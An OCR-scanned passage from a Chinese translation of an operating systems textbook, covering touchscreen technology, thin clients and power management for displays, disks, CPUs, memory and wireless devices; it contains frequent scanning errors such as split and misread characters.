花园 里 的 各 种 塑料 更 加 耐 划 伤 。 关 键 在 于 ， 要 将 钢 锡 氧 化 物 (Indium Tin Oxide, ITO) 薄膜 (或 者 类 似 
的 导体 材料 ) 以 细 线 方式 印 制 在 表面 的 底 侧 。 在 它 下 面 ， 但 是 不 与 其 完全 接触 ， 是 第 二 层 同样 覆盖 了 一 
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层 ITO 的 面 。 在 上 表面 ， 电 荷 沿 垂直 方向 运动 ， 并 且 在 上 下 存在 导电 连接 。 在 底下 一 层 ， 电 荷 沿 水 平方 
向 运 动 ， 并 且 在 左右 存在 连接 。 当 你 触摸 屏幕 时 ， 会 使 塑料 凹陷 ， 从 而 使 顶层 ITO 与 底层 相 接触 。 为 了 
找到 手指 或 触 笔 接触 的 准确 位 置 ， 你 所 要 做 的 就 是 在 底层 的 所 有 水 平 位 置 和 顶层 的 所 有 垂直 位 置 沿 两 个 
方向 对 电阻 进行 测量 。 

电容 屏 (capactive screen) 有 两 层 硬 表面 ， 一 般 是 玻璃 ， 每 个 面 都 镜 有 ITO。 典 型 的 布局 是 让 ITO 
以 平行 线 方式 添加 到 每 个 表面 ， 并 且 顶 层 中 的 线 与 底层 中 的 线 相互 垂直 。 例 如 ， 顶 层 可 能 沿 垂直 方向 镀 
上 细 线 ， 而 在 底层 则 镀 有 沿 水 平方 向 的 类 似 条 纹 模 式 。 两 个 带电 表面 被 空气 隔 开 ， 形 成 实际 上 是 小 电容 
器 的 网 格 。 电 压 交 替 地 施加 在 水 平 线 或 者 垂直 线 上 ， 而 在 另 一 线 上 将 电压 值 读 出 ， 该 电压 值 则 受 每 一 交 
叉 点 处 电容 值 的 影响 。 当 你 将 手指 放 在 屏幕 之 上 时 ， 会 改变 局 部 电容 。 通 过 在 各 处 准确 地 测量 微小 的 电 
压 变 化 ， 就 有 可 能 发 现 手 指 在 屏幕 上 的 位 置 。 这 一 操作 每 秒 钟 重复 许多 次 ， 将 触 点 的 坐标 以 (x, y) 对 
组 成 的 串 提 供给 设备 驱动 程序 。 对 于 进一步 的 处 理 ， 例 如 确定 发 生 的 是 点 击 、 捏 扰 、 张 开 还 是 滑动 ， 则 
由 操作 系统 完成 。 

电阻 屏 的 好 处 是 由 压力 决定 测量 的 产 出 。 换 句 话 说， 即便 在 寒冷 的 天 气 下 带 着 手套 触摸 ， 它 仍然 可 
以 工作 。 电 容 屏 则 不 是 这 样 ， 除 非 你 带 着 特别 的 手套 。 例 如 ， 你 可 以 乡 上 一 根 导线 (比如 镀 银 尼龙 ) 穿 
过 手套 的 指 尖 ， 要 是 不 会 做 针线 活 的 话 ， 也 可 以 买 现成 的 。 还 有 一 个 办 法 ， 你 可 以 把 手套 的 指 尖 部 分 剪 
去 ， 并且 在 10 秒 钟 内 完成 操作 。 

电阻 屏 不 好 的 地 方 在 于 它们 一 般 不 能 支持 多 点 触 控 (mnultitouch) ， 这 是 一 种 同时 检测 多 个 触 点 的 技 
术 。 它 允许 你 在 屏幕 上 用 两 个 或 者 更 多 的 手指 操作 目标 物 。 人 (或许 还 有 猩猩 ) 喜欢 多 点 触 控 ， 因 为 它 
使 人 可 以 用 两 个 手指 采用 捏 拢 和 张 开 的 手势 来 放大 或 者 缩小 图 像 或 文档 。 想 象 一 下 两 个 手指 分 别 位 于 
(3,3) 和 (8,8)。 结 果 是 ， 电 阻 屏 可 能 注意 到 在 x = 3 和 x = 8 的 垂直 线 ， 以 及 y = 3 和 y = 8 的 水 平 线 处 电 
阻 发 生 的 变化 。 现 在 考虑 一 个 不 同 的 场景 ， 手 指 位 于 (3,8) 和 (8, 3) ， 这 是 角 点 为 (3, 3) (8,3), 
(8,8) 和 (3,8) 的 矩形 的 两 个 相对 的 角 点 。 电 阻 在 完全 相同 的 线 处 发 生 了 变化 ， 所 以 软件 没有 办 法 分 
辨 两 个 场景 中 是 哪 一 个 发 生 了 。 这 一 问题 被 称 为 鬼 影 (ghosting)。 因 为 电容 屏 发 送 的 是 (x, y) 坐标 串 ， 
所 以 它 更 擅长 支持 多 点 触 控 。 

只 使 用 一 根 手指 操作 触摸 屏 仍然 是 相当 WIMP 风 格 的 一 一 你 只 不 过 是 用 触 笔 或 者 食指 代替 了 鼠标 。 
多 点 触 控 要 更 加 复杂 一 些 。 用 五 根 手指 触摸 屏幕 就 好 像 是 在 屏幕 上 同时 按 下 五 个 鼠标 指针 ， 这 显然 要 改 
变 窗口 管理 器 的 很 多 事情 。 多 点 触 屏 已 经 变 得 无 处 不 在 ， 并 且 越 来 越 灵 敏和 准确 。 然 而 ， 五 雷 挫 心 掌 9 
(Five Point Palm Exploding Heart Technique) 对 CPU 是 否 有 影响 还 不 清楚 。 


5.7 瘦 客 户 机 


多 年 来 ， 主 流 计算 范式 一 直 在 中 心 化 计算 和 分 散 化 计算 之 间 振荡 。 最 早 的 计算 机 (例如 ENIAC) 虽 
然 是 庞然大物 ， 但 实际 上 是 个 人 计算 机 ， 因 为 一 次 只 有 一 个 人 能 够 使 用 它 。 然 后 出 现 的 是 分 时 系统 ， 在 
分 时 系统 中 许多 远程 用 户 在 简单 的 终端 上 共享 一 个 大 型 的 中 心计 算 机 。 接 下 来 是 PC 时 代 ， 在 这 一 阶段 用 
户 再 次 拥有 他 们 自己 的 个 人 计算 机 。 

虽然 分 散 化 的 PC 模型 具有 长 处 ， 但 是 它 也 有 着 某 些 严重 的 不 利之 处 ， 人 们 刚刚 开始 认真 思考 这 些 
不 利之 处 。 或 许 最 大 的 问题 是 ， 每 台 PC 都 有 一 个 大 容量 的 硬盘 以 及 复杂 的 软件 必须 维护 。 例 如 ， 当 操作 
系统 的 一 个 新 版 本 发 布 时 ， 必 须 做 大 量 的 工作 分 别 在 每 台 机 器 上 进行 升级 。 在 大 多 数 公 司 中 ， 做 这 类 软 
件 维护 的 劳动 力 成 本 大 大 高 于 实际 的 硬件 与 软件 成 本 。 对 于 家 庭 用 户 而 言 ， 在 技术 上 劳动 力 是 免费 的 ， 
但 是 很 少 有 人 能 够 正确 地 做 这 件 事 ， 并 且 更 少 有 人 乐于 做 这 件 事 。 对 于 一 个 中 心 化 的 系统 ， 只 有 一 台 或 
几 台 机 器 必须 升级 ， 并 且 有 专家 班子 做 这 些 工作 。 

一 个 相关 的 问题 是 ， 用 户 应 该 定期 地 备份 他 们 的 几 G 字 节 的 文件 系统 ， 但 是 很 少 有 用 户 这 样 做 。 当 
灾难 袭 来 时 ， 相 随 的 将 是 仰天 长 叹 和 择 胸 顿 足 。 对 于 一 个 中 心 化 的 系统 ， 自 动 化 的 磁带 机 器 人 在 每 天 夜 
里 都 可 以 做 备份 。 

中 心 化 系统 的 另 一 个 长 处 是 资源 共享 更 加 容易 。 一 个 系统 具有 256 个 远程 用 户 ， 每 个 用 户 拥 有 
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256MB RAM， 在 大 多 数 时 间 这 个 系统 的 这 些 RAM 大 多 是 空闲 的 ， 然 而 某 些 用 户 临 时 需要 大 量 的 RAM 但 
是 却 得 不 到 ， 因 为 RAM 在 别人 的 PC 上 。 对 于 一 个 具有 64GB RAM 的 中 心 化 系统 ， 这 样 的 事情 绝 不 会 发 
生 。 同 样 的 论据 对 于 磁盘 空间 和 其 他 资源 也 是 有 效 的 。 

最 后 ， 我 们 将 开始 考察 从 以 PC 为 中 心 的 计算 到 以 Web 为 中 心 的 计算 的 转移 。 一 个 领域 是 电子 邮件 ， 
在 该 领域 中 这 种 转移 是 长 远 的 。 人 们 过 去 获取 投 送 到 他 们 家 庭 计算 机 上 的 电子 邮件 ， 并 且 在 家 庭 计算 机 
上 阅读 。 今 天 ， 许 多 人 登录 到 Gmail、Hotmail 或 者 Yahoo 上 ， 并 且 在 那里 阅读 他 们 的 邮件 。 下 一 步 人 们 
会 登录 到 其 他 网 站 中 ， 进 行 字 处 理 、 建 立 电子 数据 表 以 及 做 其 他 过 去 需要 PC 软件 才能 做 的 事情 。 最 后 其 
至 有 可 能 人 们 在 自己 的 PC 上 运行 的 唯一 软件 是 一 个 Web 浏 览 器 ， 或 许 甚至 没有 软件 。 

一 个 合理 的 结论 大 概 是 : 大 多 数 用 户 想 要 高 性 能 的 交互 式 计算 ,但 是 实在 不 想 管理 一 台 计 算 机 。 这 
一 结论 导致 研究 人 员 重 新 研究 了 分 时 系统 使 用 的 哑 终 端 (现在 文雅 地 称 为 瘦 客 户 机 (thin client)), Eff 
符合 现代 终端 的 期 望 。X 是 这 一 方向 的 一 个 步骤 并 且 专 用 的 X 终 端 一 度 十 分 流行 ， 但 是 它们 现在 已 经 失 
宠 ， 因 为 它们 的 价格 与 PC 相仿 ， 能 做 的 事情 更 少 ， 并 且 仍 然 需要 某 些 软件 维护 。 圣 杯 (holy grail) 应 该 
是 一 个 高 性 能 的 交互 式 计算 系统 ， 在 该 系统 中 用 户 的 机 器 根本 就 没有 软件 。 十 分 有 趣 的 是 ， 这 一 目标 是 
可 以 达到 的 。 

最 著名 的 瘦 客 户 机 之 一 是 Chromebook ， 虽 然 它 是 由 Google 积 极 推 进 的 ， 但 是 大 大 小 小 的 制造 商 们 
提供 了 各 种 各 样 的 型 号 。 该 笔记 本 运行 ChromeOS， 它 基于 Linux 和 Chrome Web 浏 览 器 ， 并 且 假 设 永久 
在 线 。 大 多 数 其 他 软件 以 Web App 的 形式 由 Web 作 为 宿主 ， 这 使 得 Chromebook 上 的 软件 栈 本 身 与 大 多 数 
传统 笔记 本 电脑 相 比 相当 纤 瘦 。 另 一 方面 ， 由 于 运行 完全 的 Linux 栈 以 及 Chrome 浏 览 器 ， 所 以 这 样 的 系 
统 也 并 不 是 100% 简 洁 的 。 


58 电源 管理 


第 一 代 通 用 电子 计算 机 ENIAC 具 有 180 00 个 电子 管 并 且 消 耗 140 000 瓦 的 电力 。 结 果 ， 它 迅速 积累 
起 非 同一 般 的 电费 账单 。 晶 体 管 发 明 后 ， 电 力 的 使 用 量 戏 剧 性 地 下 降 ， 并 且 计 算 机 行业 失去 了 在 电力 需 
求 方面 的 兴趣 。 然 而 ， 如 今 电源 管理 由 于 若干 原因 又 像 过 去 一 样 成 为 焦点 ， 并 且 操 作 系 统 在 这 里 扮演 着 
重要 的 角色 。 

我 们 从 桌面 PC 开始 讨论 。 桌 面 PC 通常 具有 200 瓦 的 电源 (其 效率 一 般 是 85%，15% 进 来 的 能 量 损失 
为 热量 ) 。 如 果 全 世界 1 亿 台 这 样 的 机 器 同时 开机 ， 合 起 来 它们 要 用 掉 20 000 兆 瓦 的 电力 。 这 是 20 座 中 等 
规模 的 核电 站 的 总 产 出 。 如 果 电 力 需求 能 够 削减 一 半 ， 我 们 就 可 以 削减 10 座 核电 站 。 从 环保 的 角度 看 ， 
削减 10 座 核电 站 (或 等 价 数目 的 矿物 燃料 电站 ) 是 一 个 巨大 的 胜利 ， 非 常 值 得 追求 。 

另 一 个 要 着 重 考 虑 电源 的 场合 是 电池 供电 的 计算 机 ， 包 括 笔记 本 电脑 、 掌 上 机 以 及 Web 便 签 短 等 。 
问题 的 核心 是 电池 不 能 保存 足够 的 电荷 以 持续 非常 长 的 时 间 ， 至 多 也 就 是 几 个 小 时 。 此 外 ， 尽 管 电池 公 
司 、 计 算 机 公司 和 消费 性 电子 产品 公司 进行 了 巨大 的 研究 努力 ， 但 进展 仍然 缓慢 。 对 于 一 个 已 经 习惯 于 
每 18 个 月 性 能 翻 一 番 (摩尔 定律 ) 的 产业 来 说 ， 毫 无 进展 就 像 是 违背 了 物理 定律 ， 但 这 就 是 现状 。 因 此 ， 
使 计算 机 使 用 较 少 的 能 量 因而 现 有 的 电池 能 够 持续 更 长 的 时 间 就 高 悬 在 每 个 人 的 议事 日 程 之 上 。 操 作 系 
统 在 这 里 扮演 着 主要 的 角色 ， 我 们 将 在 下 面 看 到 这 一 点 。 

在 最 低 的 层次 ， 硬 件 厂 商 试图 使 他 们 的 电子 装置 具有 更 高 的 能 量 效率 。 使 用 的 技术 包括 减少 晶体 管 
的 尺寸 、 利 用 动态 电压 调节 、 使 用 低 摆 幅 并 隔 热 的 总 线 以 及 类 似 的 技术 。 这 些 内 容 超 出 了 本 书 的 范围 ， 
感 兴趣 的 读者 可 以 在 Venkatachalam 和 Franz (2005) 的 论文 中 找到 很 好 的 综述 。 

存在 两 种 减少 能 量 消耗 的 一 般 方法 。 第 一 种 方法 是 当 计算 机 的 某 些 部 件 (主要 是 IO 设备 ) 不 用 的 
时 候 由 操作 系统 关闭 它们 ， 因 为 关闭 的 设备 使 用 的 能 量 很 少 或 者 不 使 用 能 量 。 第 二 种 方法 是 应 用 程序 使 
用 较 少 的 能 量 ， 这 样 为 了 延长 电池 时 间 可 能 会 降低 用 户 体验 的 质量 。 我 们 将 依次 看 一 看 这 些 方法 ， 但 是 
首先 就 电源 使 用 方面 谈 一 谈 硬件 设计 。 


5.8.1 硬件 问题 
电池 一 般 分 为 两 种 类 型 : 一 次 性 使 用 的 和 可 再 充电 的 。 一 次 性 使 用 的 电池 (AAA、AA 与 D 电 池 ) 
可 以 用 来 运转 掌上 设备 ， 但 是 没有 足够 的 能 量 为 具有 大 面积 发 光 屏 幕 的 笔记 本 电脑 供电 。 相 反 ， 可 再 充 
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电池 污染 环境 那么 严重 。 锂 电池 更 好 -一些 ， 并 且 不 需要 首先 完全 耗 尽 就 可 以 再 充电 ， 但 是 它们 的 容量 同 
样 非常 有 限 。 

大 多 数 计算 机 厂商 对 于 电池 节约 采取 的 一 般 措 施 是 将 CPU、 内 存 以 及 IO 设备 设计 成 具有 多 种 状态 ; 
工作 、 睡 眼 、 休 眼 和 关闭 。 要 使 用 设备 ， 它 必须 处 于 工作 状态 。 当 设备 在 短 时 间 内 暂时 不 使 用 时 ， 可 以 
将 其 置 于 睡眠 状态 ， 这 样 可 以 减少 能 量 消耗 。 当 设备 在 一 个 较 长 的 时 间 间 隔 内 不 使 用 时 ， 可 以 将 其 置 于 
休 眼 状态 ， 这 样 可 以 进一步 减少 能 量 消耗 。 这 里 的 权衡 是 ， 使 一 个 设备 脱离 休眠 状态 常常 比 使 一 个 设备 
脱离 睡眠 状态 花费 更 多 的 时 间 和 能 量 。 最 后 ， 当 一 个 设备 关闭 时 ， 它 什么 事情 也 不 做 并 且 也 不 消耗 电能 。 
并 非 所 有 的 设备 都 具有 这 些 状态 ， 但 是 当 它 们 具有 这 些 状态 时 ， 应 该 由 操作 系统 在 正确 的 时 机 管理 状态 
的 变迁 。 

某 些 计算 机 具有 两 个 甚至 三 个 电源 按钮 。 这 些 按钮 之 一 可 以 将 整个 计算 机 置 于 睡眠 状态 ， 通 过 键入 
一 个 字符 或 者 移动 鼠标 ， 能 够 从 该 状态 快速 地 唤醒 计算 机 。 另 一 个 按钮 可 以 将 计算 机 置 于 休眠 状态 ， 从 
该 状态 唤醒 计算 机 花费 的 时 间 要 长 得 多 。 在 这 两 种 情况 下 ， 这 些 按钮 通常 除了 发 送 一 个 信号 给 操作 系统 
外 什么 也 不 做 ， 剩 下 的 事情 由 操作 系统 在 软件 中 处 理 。 在 某 些 国家 ， 依 照 法 律 ， 电 气 设备 必须 具有 一 个 
机 械 的 电源 开关 ， 出 于 安全 性 考虑 ， 该 开关 可 以 切断 电路 并 且 从 设备 撤去 电能 。 为 了 遵守 这 一 法 律 ， 可 
能 需要 另 一 个 开关 。 

电源 管理 提出 了 操作 系统 必须 处 理 的 若干 问题 ， 其 中 许多 问题 涉及 资源 休 眼 一 一 选择 性 地 、 临 时 性 
地 关闭 设备 ,或 者 至 少 当 它们 空闲 时 减少 它们 的 功率 消耗 。 必 须 回答 的 问题 包括 : 哪些 设备 能 够 被 控 
制 ? 它们 是 工作 的 还 是 关闭 的 ， 或 者 它们 具有 中 间 状 态 吗 ?在 低 功 耗 状 态 下 节省 了 多 少 电能 ?重启 设备 
消耗 能 量 吗 ? 当 进 入 低 功 耗 状态 时 是 不 是 必须 保存 某 些 上 下 文 ? 返回 到 全 功 耗 状态 要 花费 多 长 时 间 ? 当 
然 ， 对 这 些 问题 的 回答 是 随 设备 而 变化 的 ， 所 以 操作 系统 必须 能 够 处 理 一 个 可 能 性 的 范围。 

许多 研究 人 员 研究 了 笔记 本 电脑 以 了 解 电能 
的 去 向 。Li 等 人 (1994) 测量 了 各 种 各 样 的 工作 | 
负荷 ， 得 出 的 结论 如 图 5-40 所 示 。Lorch 和 Smith 
(1998) 在 其 他 机 器 上 进行 了 测量 ， 得 出 的 结论 “a | 
如 图 5-40 所 示 。Weiser 等 人 (1994) 也 进行 了 测 
量 ， 但 是 没有 发 表 数值 结果 。 这 些 结论 清楚 地 说 
明 能 量 吸收 的 前 三 名 依次 是 显示 器 、 硬 盘 和 CPU。 1% | 
可 能 因为 测量 的 不 同 品牌 的 计算 机 确实 具有 不 同 22% 

的 能 量 需 求 ， 这 些 数字 并 不 紧密 地 吻合 ， 但 是 很 图 5.40 笔记 本 电脑 各 部 件 的 功率 消 村 
显然 ， 显 示 器 、 硬 盘 和 CPU 是 节约 能 量 的 目标 。 

在 智能 手机 这 样 的 设备 上 ， 可 能 有 其 他 的 电能 消耗 ， 例 如 射频 和 GPS。 尽 管 在 本 节 中 我 们 聚焦 在 显示 器 、 
磁盘 、CPU 和 内 存 上 ， 但 对 于 其 他 外 部 设备 而 言 原理 是 同样 的 。 

5.8.2 操作 系统 问题 

操作 系统 在 能 量 管理 上 扮演 着 一 个 重要 的 角色 ， 它 控制 着 所 有 的 设备 ， 所 以 它 必须 决定 关闭 什么 设 
备 以 及 何 时 关闭 。 如 果 它 关闭 了 一 个 设备 并 且 该 设备 很 快 再 次 被 用 户 需要 ， 可 能 在 设备 重启 时 存在 恼人 
的 延迟 。 另 一 方面 ， 如 果 它 等 待 了 太 长 的 时 间 才 关 闭 设备 ， 能 量 就 白白 地 浪费 了 。 

这 里 的 技巧 是 找到 算法 和 启发 式 方法 ， 让 操作 系统 对 关于 关闭 什么 设备 以 及 何 时 关闭 能 够 作出 良好 
的 决策 。 问 题 是 “良好 ”是 高 度 主观 的 。 一 个 用 户 可 能 觉得 在 30s 未 使 用 计算 机 之 后 计算 机 要 花费 2s 的 
时 间 响 应 击 键 是 可 以 接受 的 。 另 一 个 用 户 在 相同 的 条 件 下 可 能 会 发 出 一 连 串 的 诅咒 。 

1. 显示 器 
现在 我 们 来 看 一 看 能 量 预算 的 几 大 消耗 者 ， 考 虑 一 下 对 于 它们 能 够 做 些 什么 。 在 每 个 人 的 能 量 预算 中 
最 大 的 项 目 之 一 是 显示 器 。 为 了 获得 明亮 而 清晰 的 图 像 ， 屏 幕 必须 是 背光 照明 的 ， 这 样 会 消耗 大 量 的 能 量 。 
许多 操作 系统 试图 通过 当 几 分 钟 的 时 间 没有 活动 时 关闭 显示 器 而 节省 能 量 。 通 常用 户 可 以 决定 关闭 的 时 间 
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间隔 ， 因 此 将 屏幕 频繁 地 熄灭 和 很 快 用 光电 池 之 间 的 折 中 推 回 给 用 户 (用 户 可 能 实际 上 并 不 希望 这 样 )。 关 
闭 显 示 器 是 一 个 睡眠 状态 ， 因 为 当 任 意 键 被 融 击 或 者 定点 设备 移动 时 ， 它 能 够 (从 视频 RAM) 即时 地 再 生 。 

Flinn 和 Satyanarayanan (2004) 提出 了 一 种 可 能 的 改进 。 他 们 建议 让 显示 器 由 若干 数目 的 区 域 组 成 ， 
这 些 区 域 能 够 独立 地 开启 和 关闭 。 在 图 5-41 中 ， 我 们 描述 了 16 个 区 域 ， 使 用 虚线 分 开 它们 。 当 光标 在 窗 
口 2 中 的 时 候 ， 如 图 5-41a 所 示 ， 只 有 右 下 角 的 4 个 区 域 必须 点 亮 。 其 他 12 个 区 域 可 以 是 黑暗 的 ， 节 省 了 
3/4 的 屏幕 功 耗 。 

当 用 户 移动 鼠标 到 窗口 1 时 ， 窗 口 2 的 区 域 可 以 变 暗 并 且 窗 口 1 后 面 的 区 域 可 以 开启 。 然 而 ， 因 为 窗 
口 ] 横 跨 9 个 区 域 ， 所 以 需要 更 多 的 电能 。 如 果 窗 口 管理 器 能 够 感知 正在 发 生 的 事情 ， 它 可 以 通过 一 种 对 
齐 区 域 的 动作 自动 地 移动 窗口 1 以 适合 4 个 区 域 ， 如 图 5-41lb 所 示 。 为 了 达到 这 一 从 9/16 全 功率 到 4/16 全 功 
率 的 缩减 ， 窗 口 管 理 器 必须 理解 电源 管理 或 者 能 够 从 系统 的 某 些 其 他 做 这 些 工作 的 部 分 接收 指令 。 更 加 
复杂 的 是 能 够 部 分 地 照 亮 不 完全 充满 的 窗口 (例如 ， 包 含 文本 短线 的 窗口 可 以 在 右手 边 保 持 黑暗 )。 





图 5-41 针对 背光 照明 的 显示 器 使 用 区 域 : a) 当 窗 口 2 被 选中 时 ， 该 窗口 不 移动 ，b) 当 窗 口 1 被 选中 时 ， 
该 窗口 移动 以 减少 照明 的 区 域 的 数目 


2. 硬盘 

另 一 个 主要 的 祸首 是 硬盘 ， 它 消耗 大 量 的 能 量 以 保持 高 速 旋转 ， 即 使 不 存在 存 取 操作 。 许 多 计算 机 ， 
特别 是 笔记 本 电脑 ， 在 几 秒 钟 或 者 几 分 钟 不 活动 之 后 将 停止 磁盘 旋转 。 当 下 一 次 需要 磁盘 的 时 候 ， 磁 盘 
将 再 次 开始 旋转 。 不 幸 的 是 ， 一 个 停止 的 磁盘 是 休眠 而 不 是 睡眠 ， 因 为 要 花费 相当 多 的 时 间 将 磁盘 再 次 
旋转 起 来 ， 导 致 用 户 感 到 明显 的 延迟 。 

此 外 ， 重 新 启动 磁盘 将 消耗 相当 多 额外 的 能 量 。 因 此 ， 每 个 磁盘 都 有 一 个 特征 时 间 7. 为 它 的 个 亏 平 
衡 点 ，Ts 通 常 在 5 ~15s 的 范围 之 间 。 假 设 下 一 次 磁盘 存 取 预计 在 未 来 的 某 个 时 间 1 到 来 。 如 果 1<T,， 那 么 
保持 磁盘 旋转 比 将 其 停止 然后 很 快 再 将 其 开启 要 消耗 更 少 的 能 量 。 如 果 1>T,， 那 么 使 得 磁盘 停止 而 后 在 
较 长 时 间 后 再 次 启动 磁盘 是 十 分 值得 的 。 如 果 可 以 做 出 良好 的 预测 (例如 基于 过 去 的 存 取 模式 )， 那 么 
操作 系统 就 能 够 做 出 良好 的 关闭 预测 并 且 节 省 能 量 。 实 际 上 ， Si ela 往往 是 在 几 分 
钟 不 活动 之 后 才 停 止 磁盘 。 

节省 磁盘 能 量 的 另 一 种 方法 是 在 RAM 中 拥有 一 个 大 容量 的 磁盘 高速 级 存 。 如 果 所 需要 的 数据 抉 在 
高 速 缓 在 中 ， 空 闲 的 磁盘 就 不 必 为 满足 读 操 作 而 重新 启动 。 类 似 地 ， 如 果 对 磁盘 的 写 操作 能 够 在 高 速 组 
存 中 缓冲 ， 一 个 停止 的 磁盘 就 不 必 只 为 了 处 理 写 操作 而 重新 启动 。 磁 盘 可 以 保持 关闭 状态 直到 高 速 缓 存 
填 满 或 者 读 缺 失 发 生 。 

避免 不 必要 的 磁盘 启动 的 另 一 种 方法 是 : 操作 系统 通过 发 送 消 息 或 信号 保持 将 磁盘 的 状态 通知 给 正 
在 运行 的 程序 。 某 些 程序 具有 可 以 自由 决定 的 写 操作 ， 这 样 的 写 操作 可 以 被 略 过 或 者 推迟 。 例 如 ， 一 个 
字 处 理 程序 可 能 被 设置 成 每 隔 几 分 钟 将 正在 编辑 的 文件 写 人 磁盘 。 如 果 字 处 理 程序 知道 当 它 在 正常 情况 
下 应 该 将 文件 写 到 磁盘 的 时 刻 磁盘 是 关闭 的 ， 它 就 可 以 将 本 次 写 操作 推迟 直到 下 一 次 磁盘 开启 。 

3. CPU 

CPU 也 能 够 被 管理 以 节省 能 量 。 笔 记 本 电脑 的 CPU 能 够 用 软件 置 为 睡眠 状态 ， 将 电能 的 使 用 减少 到 
几乎 为 零 。 在 这 一 状态 下 CPU 唯一 能 做 的 事情 是 当中 断 发 生 时 醒 来 。 因 此 ， 只 要 CPU 变 为 空闲 ， 无 论 是 
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因为 等 待 WO 还 是 因为 没有 工作 要 做 ， 它 都 可 以 进入 睡眠 状态 。 
在 许多 计算 机 上 ， 在 CPU 电压 、 时 钟 周 期 和 电能 消耗 之 间 存在 着 关系 。CPU 电 压 可 以 用 软件 降低 ， 
这 样 可 以 节省 能 量 但 是 也 会 (近似 线性 地 ) 降低 时 钟 速度 。 由 于 电能 消耗 与 电压 的 平方 成 正比 ， 将 电压 
降低 一 半 会 使 CPU 的 速度 减 慢 一 半 ， 而 电能 消耗 降低 到 只 有 1/4。 
对 于 具有 明确 的 最 终 时 限 的 程序 而 言 ， 这 一 特性 可 以 得 到 利用 ， 例 如 多 媒体 观察 器 必须 每 40ms 解 压缩 
并 显示 一 帧 ,但 是 如 果 它 做 得 太 快 它 就 会 变 得 空间 。 假 设 CPU 全 速 运 行 40ms 消 耗 了 x 焦耳 能 量 ， 那 么 半 速 
运行 则 消耗 4 焦耳 的 能 量 。 如 果 多 媒体 观察 器 能 够 在 20ms 内 解压 缩 并 显示 一 帧 ， 那 么 操作 系统 能 够 以 全 功 
率 运行 20ms， 然 后 关闭 20ms， 总 的 能 量 消耗 是 2 焦耳 。 作 为 替代 ， 它 能 够 以 半 功 率 运行 并 且 恰 好 满足 最 
终 时 限 ， 但 是 能 量 消耗 是 4 焦耳。 以 全 速 和 全 功率 运行 某 个 时 间 间 隔 与 以 半 速 和 四 分 之 一 功率 运行 两 倍 长 
时 间 的 比较 如 图 5-42 所 示 。 在 这 两 种 情况 下 做 了 相同 的 工作 ， 但 是 在 图 5-42b 中 只 消耗 了 一 半 的 能 量 。 
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图 5-42 a) 以 全 时 钟 速度 运行 ，b) 电压 减 半 使 时 钟 速度 削减 一 半 并 且 功 率 削 减 到 1/4 


类 似 地 ， 如 果 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 但 是 处 理 字 符 所 需 的 工作 要 花费 100ms 的 时 间 ， 
操作 系统 最 好 检测 出 长 时 间 的 空闲 周期 并 且 将 CPU 放 慢 10 倍 。 简 而 言 之 ， 慢 速 运行 比 快速 运行 具有 更 高 
的 能 量 效率 。 

有 趣 的 是 ， 放 慢 CPU 核 并 不 总 是 意味 着 性 能 的 下 降 。Hruby 等 人 (2013) 展示 了 有 时 在 使 用 较 慢 的 
核 的 情况 下 ， 网 络 栈 的 性 能 也 会 得 到 改进 。 对 这 一 现象 的 解释 是 CPU 核 可 能 为 了 自己 好 而 运行 得 更 快 。 
例如 ， 设 想 一 个 CPU 有 若干 个 快速 的 核 ， 其 中 有 一 个 核 负责 为 运行 在 另 一 个 核 上 的 生产 者 传输 网 络 包 。 
生产 者 和 网 络 栈 通过 共享 内 存 直 接 通信 ， 并 且 它 们 都 运行 在 专门 的 核 上 。 生 产 者 执行 相当 数量 的 计算 ， 
并 且 不 能 很 好 地 跟 上 运行 网 络 栈 的 核 的 步伐 。 在 典型 的 运行 过 程 中 ， 网 络 将 传输 它 必须 要 传输 的 所 有 数 
据 ， 并 且 要 花 一 定时 间 来 轮 询 共 享 内 存 ， 以 了 解 是 否 真 的 没有 更 多 的 数据 要 传输 。 最 后 ， 它 将 放弃 CPU 
核 并 且 睡 眠 ， 因 为 连续 轮 询 造成 的 电能 消耗 是 非常 严重 的 。 不 久 ， 生 产 者 提供 了 更 多 的 数据 ， 但 是 此 时 
网 络 栈 正在 熟睡 ， 唤 醒 网 络 栈 要 花 时 间 而 且 会 降低 吞吐 量 。 一 种 可 能 的 解决 方案 是 永 不 睡眠 ， 但 是 这 样 
做 也 不 招 人 喜欢 ， 因 为 这 会 增加 电能 消耗 一 一 与 我 们 要 达到 的 目的 正好 相反 。 一 种 更 加 吸引 人 的 解决 方 
案 是 在 较 慢 的 核 上 运行 网 络 栈 ， 这 样 它 就 能 持续 地 保持 忙碌 (并 且 永 不 睡眠 )， 与 此 同时 还 能 够 减少 电 
能 消耗 。 与 所 有 的 核 都 炽 烈 地 高 速 运行 这 样 的 配置 相 比 ， 精 心地 放 慢 网 络 核 的 性 能 会 更 好 。 

4. 内 存 

对 于 内 存 ， 存 在 两 种 可 能 的 选择 来 节省 能 量 。 首 先 ， 可 以 刷新 然后 关闭 高 速 缓 存 。 高 速 缓存 总 是 能 够 
从 内 存 重 新 加 载 而 不 损失 信息 。 重 新 加 载 可 以 动态 并 且 快速 地 完成 ， 所 以 关闭 高 速 缓存 是 进入 睡眠 状态 。 

更 加 极端 的 选择 是 将 主 存 的 内 容 写 到 磁盘 上 ， 然 后 关闭 主 存 本 身 。 这 种 方法 是 休眠 ， 因 为 实际 上 所 
有 到 内 存 的 电能 都 被 切断 了 ， 其 代价 是 相当 长 的 重新 加 载 时 间 ， 尤 其 是 如 果 磁 盘 也 被 关闭 了 的 话 。 当 内 
存 被 切断 时 ，CPU 或 者 也 被 关闭 ， 或 者 必须 自 ROM 执 行 。 如 果 CPU 被 关闭 ， 将 其 唤醒 的 中 断 必须 促使 它 
跳 转 到 ROM 中 的 代码 ， 从 而 能 够 重新 加 载 内 存 并 且 使 用 内 存 。 尽 管 存在 所 有 这 些 开销 ， 将 内 存 关闭 较 
长 的 时 间 周期 《例如 几 个 小 时 ) 也 许 是 值得 的 。 与 常常 要 花费 一 分 钟 或 者 更 长 时 间 从 磁盘 重新 启动 操作 
系统 相 比 ， 在 几 秒 钟 之 内 重新 启动 内 存 想来 更 加 受 欢迎 。 

5. 无 线 通信 

越 来 越 多 的 便携 式 计算 机 拥有 到 外 部 世界 (例如 Internet) 的 无 线 连接 。 无 线 通信 必需 的 无 线 电 发 
送 器 和 接收 器 是 头等 的 电能 贪 吃 者 。 特 别 是 ， 如 果 无 线 电 接收 器 为 了 侦 昕 到 来 的 电子 邮件 而 始终 开 着 ， 
